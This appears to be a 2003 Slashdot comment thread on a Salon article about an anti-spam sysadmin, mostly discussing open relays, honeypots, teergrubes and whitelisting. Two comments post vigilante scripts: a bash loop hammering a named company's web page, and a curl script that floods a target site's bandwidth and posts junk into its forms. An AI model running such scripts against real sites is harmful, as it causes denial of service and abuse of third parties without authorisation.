Fighting the Hydra -- A Spam Warrior's Tale

Selanit writes "Salon has an interesting article about the battle against spam from the viewpoint of Suresh Ramasubramanian, a sysadmin working in Hong Kong. His most interesting complaint concerns the fragmentation of anti-spam forces: not only does he have to deal with spammers, but also with anti-spammers who assume because his company is Chinese that he isn't doing anything about spam. Hmm ... decentralized opponents striking from the shadows against quarreling allies. Does this sound familiar to anyone else?"

Interesting idea

Just one question... what if the spammer doesn't connect to your SMTP server to send billions of messages from it? What if the spammer (with half a brain, and some scripting ability), only sends a few emails through your SMTP server? Most SMTP servers are wide open still, and simply sending 10 emails on one server and moving on to another open server would be so low that statistical usage wouldn't show anything on the radar screen... or did I not understand what you are trying to do?

Re:Interesting idea

[Newtonian_p]

No, most SMTP servers are not wide open. If your ran an SMTP and left it open, it wouldn't be long before it got blacklisted.

And say a spammer wants to send 10 million emails in a day. At 10 emails/open relay he/she would need to find 1 million open relays which isn't the easiest thing to do.

One way to slow a specific flood

[fanatic]

From the article: expert spammers can also switch IP addresses as quickly as the blocks are applied.

A honeypot for spam - mentioned here previously, I think - would be one answer. It would recognize a spammer and, instead of disconnecting, it would accept all the spam - very sllloooowwwly, then discard it. It's not a trivial programming task, since the spam would have to be recognized, then treated differently from that point on from regular email. But it's feasible, I think and would help fight the large scale attack noted at the beginning of the linked article.

Re:One way to slow a specific flood

You're reinventing the "teergrube".

Re:One way to slow a specific flood

[kasperd]

A honeypot for spam - mentioned here previously, I think - would be one answer.

I have previously mentioned a honeypot here, but not the one you are talking about. I try to receive the spam as fast as possible in the hope that every spam ending up in my honeypot is one less spam to end up elsewhere. But I feel it is getting harder to attract spam. Though I have been working hard to make my honeypot attract lots of spam, and in the process managed to get my IP on OpenRelayCheck, I only got 1.3 million yesterday. My record from october 2002 was 36 million in 4 days.

Re:One way to slow a specific flood

[flonker]

I run a program that just listen on port 25, pretending to be an open relay, and logs all relay tests to a file. I get scanned by testers using the following two email hosts constantly. The 21cn.com one has been using the same exact address for months now. Almost makes me want to mailbomb them.

Mar 27 08:07:18 [210.222.196.141:27910]
ehlo ll-nidaf2xx5kn9
Rset
Mail from:<china9988@21cn.com>
RCPT to:<china9988@21cn.com>
Data
From: china9988@21cn.com
Subject: 68.22.196.106
To: china9988@21cn.com
Date: Thu, 27 Mar 2003 23:20:51 +0900
X-Priority: 3
X-Library: Indy 8.0.25
t_Smtp.LocalIP
.
Quit

Mar 27 19:23:10 [210.222.196.133:58885]
HELO hanmail.net
MAIL FROM:<jkdsa@hanmail.net>
RCPT TO:<mg0108@hanmail.net>
DATA
Message-ID: <20820-2200335282014339@hanmail.net>
X-EM-Version : 6, 0, 0, 4
X-EM-Registration: #0010630410721500AB30
Reply-To: rolliey@hotmail.com
From: "good" <jkdsa@hanmail.net>
To: mg0108@hanmail.net
Subject: 68.22.196.106
Date: Fri, 28 Mar 2003 11:00:14 +0900
MIME-Version: 1.0
Content-Type: text/html; charset=KS_C_5601-1987
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
<META NAME=3D"GENERATOR" Content=3D"Microsoft DHTML Editing Control">
<TITLE></TITLE>
</HEAD>
<BODY>
<P></ P>
</BODY>
</HTML>
.
QUIT

Re:One way to slow a specific flood

[kasperd]

I run a program that just listen on port 25, pretending to be an open relay, and logs all relay tests to a file.

That is also what I do, and your probes sure look familiar. Occationally I actually relay the probes to see what they are actually up to, and then I get loads of spam. I also run another program on ports 1080, 3128, 6588, 8000, and 8080 that pretends to an open proxy which can be used to connect to an open relay. Next step would be to automatically report received spam to razor.

Re:Fight the good fight

[arvindn]

For more fun on fighting spam see NANA

Fun? The article repeatedly made the point that fighting spam is no fun at all.

Re:Whitelisting is the answer

[Tailhook]

Peace has finally come from a package called Active Spam Killer [paganini.net], a package which works from a white list, and provides a convenient way for new correspondents to get themselves onto the whitelist.

You're adding an authentication layer to your specific mail account. Now, all we need to do is implement 4.1234E13 different mail account authentication systems. Each with it's own bugs, weirdo assumptions (HTML only, perhaps? Imagine how Mickysoft might do this...) and other deficiencies. Everyone you correspond with will have a different one. What fun!

Authentication is the only feasible solution to spam. If we could collectively decide on a method of implementing it in a standard fashion we could avoid the mess.

Don't hold your breath.

disgusting

[danbuhler]

Just the thought of this makes me sick.. Almost as sick as those who make spamming profitable.

Now that I've thought about it. How is spamming still profitable? Are there that many people out there that are into having sex with farm animals? Or believe their are pills that increase life span? Who the hell are these people?

Outblaze, huh?

[Pathwalker]

Those guys have to run the most annoying relay tester I've seen. Every time it tests you, it sends a burst of 30 messages or so, all with return addresses on the box they are testing so they don't have to deal with bounces.

Now, some people may feel it's my own fault for taking advantage of the part of RFC 2821 which states that if a mailserver defers checking to see if it can relay or deliver the mail then "These servers SHOULD treat a failure for one or more recipients as a "subsequent failure" and return a mail message as discussed in section 6.".

But, I guess they feel that everyone runs sendmail, so every time they test my mailserver, I end up with another batch of relay rejected messages intended for them sitting in my postmaster mailbox.

There are two parts of this that bug me:

1. If a mail server does not relay mail, it is rude for a test to result in mail to the administrators of that server
2. It is possible for the username they use in their test to actually deliver mail to a real user. I consider it as bad as spamming if their test drops dozens of messages in the account of an innocent user with no idea of what is happening, or control over the mail server.

Yeah, but

[autopr0n]

1) you would have their real email address and
2) you could use a 'what number is this a picture of' type questions. The problem is figuring out how to make it multilingual.

But really it dosn't need to be standardized at all, since these things are going to have to be handled by real people, rather then computers.

Make money fast by altering behavior

Taken from a larger context, spam is just another facet in life from which emerges attempts to control our behavior.

A glaring example brought forward by the war in Iraq is the ceaseless barrage of sloganeering one faces these days. Some of it in favor of the war, some against. Some more coordinated than others.

How much remains when the content added to bend our will is removed? How much from the war news, from life in general?

I'm sick of it. Life is complex enough without having to move about in a cloud of misleading information.
No wonder everyone is half nuts these days. GIGO.

Re:Anti-chinese bias

[DOsinga]

> Yeah, these people blocking all mail from Chinese and korean
> subdomains are idiots. How are they supposed to work with anti-spammers
> there if they can't even talk to them?

While spam might come from Chinese or Korean subdomains, it usually is about American products to the degree that the stuff offered is completely useless for someone from the Netherlands. They might at least filter on the target email address you'd think.

Flaws with the accepting mail slowly defense

[dmeranda]

"Excessively slow server detection will be a standard feature of all next generation spam software"

Let's hope so. Then I'd just accept all mail slowly and spam would go away!

Seriously there are flaws in this kind of defense. First, I'm already seeing several spammers who already send mail slowly, probably to avoid setting off statistical trappers and to make it harder to scan through log files. Also don't forget that the spammers usually have much more bandwidth than the recipient; you can never win by trying to fight the battle of resources!

BTW, this is NOT very tricky programming to do if you use the Milter programming interface to sendmail...in fact it is quite easy to do. But like I mentioned, you're sort of self defeating, because you burn your own resources by being slow.

Teergrube

[KjetilK]

I have a few honeypots (trollboxes or spamtraps, you may call them), and they do get a lot of spam. For example, I code things like

<link rel="DoNotEmail" href="mailto:aa0u@kjernsmo.net" />

(yeah, that's a real, living trollbox, spambots, do your worst! :-) ) Very few users will ever see this, but the spambots will harvest it. It is clear that many of them do.

The other thing you mention, I think that is what is meant by a Teergrube. Marc Merlin has some good stuff on using Exim and SpamAssassin to reject messages or making spammers stick in a teergrube. He has some debs too.

Unfortunately, I haven't had time and I haven't been feeling adventurous enough to try all this, but clearly, it works well.

Re:Another world group?

[BrookHarty]

I don't see how anyone is going to trust the USA in an international treaty any time soon. The USA will simply opt out of any regulation as soon as it hampers their economic well-being.

First.

Get off the USA bashing kick, all countries look after their own economic needs. (aka, sweat shops are illegal in the USA, but the WTO says that in 3rd world countries as its the only work available, they are legal...)

Second.

The USA (aka Federal Government) has nothing to do with Spam guidelines unless its a Federal Law. (Which could be considered a violation of Interstate Commerce, thats part of the reason no laws are passed at the Federal level... btw, IANAL...) This is also why we are trying to pass State level laws for Spam.

But, if ISPs who want to deal with SPAM can join blacklists, whitelists, coalition, etc. Nothing is stopping them. But on the Other side, there is money to be made in Spam, and companies willing to make a buck will do it. (All around the world, not just the USA or Hong Kong.)

Re:The bounce problem

[Hellkitten]

One possible solution to the problem of bounce messages is to not send them.

When an undeliverable mail arrives check against a set of criteria, and if the mail looks like spam then don't send the bounce, since the adresses are likely to be faked anyway. This way the poor sod that got his adress used as the sender won't recieve (as many) bounces. The disadvantage is the possibility for false positives, that a legitimate mail might be tagged as spam and the sender won't see the bounce. Anyway for a large mail service it should be relatively easy to detect multiple identical undeliverable mails, and then don't bounce for them.

In the event that a spammer uses a real "bounce-to" address to clean their adress list this would rob them of that possibility too

Long time spamfighter

[tsvk]

Shuresh is also a regular poster in the newsgroup news.admin.net-abuse.email, a discussion forum about e-mail abuse.

Check his postings from the Google Groups archive.

Filling referenced website logs with crap?

[BigBlockMopar]

How do people feel about scripts to fill website logs with crap? Here's mine, quick and dirty, written in about 30 seconds because I was pissed off:

#!/bin/bash
COUNT=0
while [ $COUNT -lt 10000 ]; do
lynx -dump http://www.resumeagencies.com/recruiterspage.asp?Y OU_FILL_MY_MAILBOX_WITH_UNSOLICITED_CRAP_AND_I_WIL L_DO_THE_SAME_TO_YOUR_WEBLOGS
sleep 1
let COUNT=COUNT+1
echo $COUNT
done

Note the fact that I'm calling what I hope is a dynamic page, so with luck, I'm wasting their server's processor time. The script is otherwise, as you can see, completely unrefined.

Legality, anyone? Other problems (despite the obvious fact that I have to waste my bandwidth to fuck with spammers)? Obviously, it's a DoS attack of sorts, but then again, so is an unsolicited e-mail. If they want to challenge me legally on that point, then I will do the same to them. My website very clearly points to the policies which apply to all e-mails sent to my domain.

Re:Filling referenced website logs with crap?

[drunkToaster]

Maybe, but getting the local postal service on-side can also be a good thing, why not try randomising the "Name" , "Surname" fields, but pick an address you know to be bogus. My favorite is a street in my hometown that only has houses on one side - a sandstone wall on the other, hence only (in this case) even numbers. Just make the postal address (Random ODD number) McRealStreet , State, PostCode, Country. All of a sudden the government owned and run postal service is flooded with garbage that they can't deliver. Cost's the spammer's "beneficiary" in paper/postage and may even piss off the postal service enough to take their own action

Something about the article bothers me....

[wowbagger]

There was something about the article that bothered me - perhaps it was just unclear reporting, or perhaps it wasn't.

According to the article, this guy is having to block off a flood of mail from spammers to his system. The way I read the article, this flood is not for Outblaze users, but just for relaying. Why the bleep does his mail server even accept this mail? Any modern sensible set up mail server should follow a ruleset like:

if (sender is one of my users)
accept
else if (recepient is one of my users)
accept
else
bugger off spammer
endif


Ideally, the mail server would log system that were trying to send mail that didn't pass that test and tell the router to drop packets from them for a few hours.

Bam! 90% of problem solved.

Having received spams relayed by Outblaze servers, I don't think that's what is happening. I think they are running open mail servers, and trying to keep the spammers from using them.

I could be wrong, but that's how I read the article.

Re:Something about the article bothers me....

>According to the article, this guy is having to >block off a flood of mail from spammers to his >system. The way I read the article, this flood >is not for Outblaze users, but just for >relaying. Why the bleep does his mail server >even accept this mail? Any modern sensible set >up mail server should follow a ruleset like:

Don't put words in Suresh's mouth. He said he was trying to deal with a flood of BOUNCES to his system because the spammers FORGED addresses serviced by Outblaze.
>
>if (sender is one of my users)
> accept
>else if (recepient is one of my users)
> accept
>else
> bugger off spammer
>endif

Twit. Anybody who runs his server like this is bound to be abused by spammers because ANYBODY can FORGE the sender. Any modern sensible setup will NEVER use rules like this. All modern sensible setups use these rules:

1) for ISPs who have dialup/broadband users:
if email is from ISP network ips = RELAY
if connection authenticates via POP-B4-SMTP or SMTP-Auth = RELAY
if not, if recipient is ours = ACCEPT
else DENY

2) ISPs who do not have a bunch of ips to relay for:
if connection authenticates via POP-B4-SMTP or SMTP-Auth = RELAY
if recipient is ours ACCEPT
else DENY

>Having received spams relayed by Outblaze >servers, I don't think that's what is happening. >I think they are running open mail servers, and >trying to keep the spammers from using them.

I think you are lying and not very good at it. 1) Post headers with proof that they are 'open mail servers'. 2) There are plenty of spammers out there who would love to make use of the delivery capacity of a system that can deliver 15 million emails daily and there are more who are anti-spammers who would immediately recommend Outblaze servers be listed on SPEWS, ORB, SPAMCOP and other RBLs but for some reason they haven't.

>I could be wrong, but that's how I read the >article.

Looks like you need to go back to school and take comprehension tests and I doubt that will help since the post you made shows an obvious attempt to badmouth Outblaze. Not much a school can do when the problem is not in the mind.

Here's a nice one...

[pr0ntab]

Make sure you have curl and usleep.

First, try to convince the server to give you a listing of /images/ and/or the web root with like the /?A=D trick. /icons/ is also useful. Save this somewhere.
Then, turn it into a big list of URLs for pages and images, say "url_file_you_made". Finally, write a shell script to use that for nefarious purposes, like this:

end = $(($(date +%s) + 3600)) # 1 hour from now
while [ $(date +%s) -lt $end ]; do
for each in $(cat url_file_you_made); do
curl -e "SPAM_EQUALS_I_POISON_YOUR_REFERAL_LOGS" \
-A "libcurl in da hizzouse" \
-m 1 -o /dev/null ${each} &
usleep 500000
done
done

That one really can suck down some bandwidth, especially if you tweak the usleep. In this case, each download is forked off and lasts for at most 1 second, so with usleep at .5 seconds you get on average two downloads from the list going at once. But if you decrease it to 250000, then you can have 4, etc. So this will hit all the docs on the site for an hour and waste their bandwidth (the logic being that those cheap webhosting providers hit the spammer with a huge penalty if they go over a transfer limit, but your downstream bandwidth from your ISP is cheap.)

Also if the form is POST, you can use good ol' curl again like this to poison it:

curl http://suckymlmsite.com/formmail.php -F "name=Dickhead" -F "address=Sucking my cock"

note it isn't URL encoded. That's multipart. You can do URL encoded POST with

-d "name=dickweed&address=Your%20Mom"

verrry slowly

[germinatoras]

Heh...I run sendmail on a 486DX/33. I accept everything very slowly. :-)

But in all seriousness - I expect that some day, somebody will find a security hole which I've overlooked. However, when that day comes, my little 486 certainly won't be much of an asset. If a spammer finds a way to exploit sendmail, and tries to relay 5 bazillion e-mails, my box would certainly crash. I consider it a boon to the internet if I make myself very difficult to exploit, and sticking a just-barely-does-the-job server up there is a step in that direction. I'd rather have my home server fall on its sword than help fight a battle for the spammers.

Re:Flaws with the accepting mail slowly defense -

[BattyMan]

You know this is trivial to defeat right?

Detect and run from, sure, but not _defeat_. (for a value or "defeat" == "get yer spam through")

Excessively slow server detection will be a standard feature of all next generation spam software.

Oh it is now. Has been, for at least a year. My buddy, who runs his own mail server, teergrubes anything he can detect as spam. The spammers flee, then remove him from their lists. He cares not whether this is automatic or requires manual effort on the part of the spammer. They go away.

I'd make it even simpler: teergrube _everything_, for about fifteen seconds a line. Legit mail has to tolerate these kinds of delays (and much worse, in fact) in order to get through to servers which are stuffed with spam traffic. A spammer can't afford to fool around for even one minute to send a message - he has to send a million a day in order to make money. Of course this probably wouldn't work for Mr. Ramasubramanian, but it will for my friend, and for me if I ever put up a mail server. You'd probably be pleasantly surprised at how many of those 32767+ connections will be dropped _immediately_ at the first continuation reply, no matter how short its delay.

I still think you can never win the resource battle

Sure we can. A thousand spammers facing 1,000,000 tarpits haven't a chance.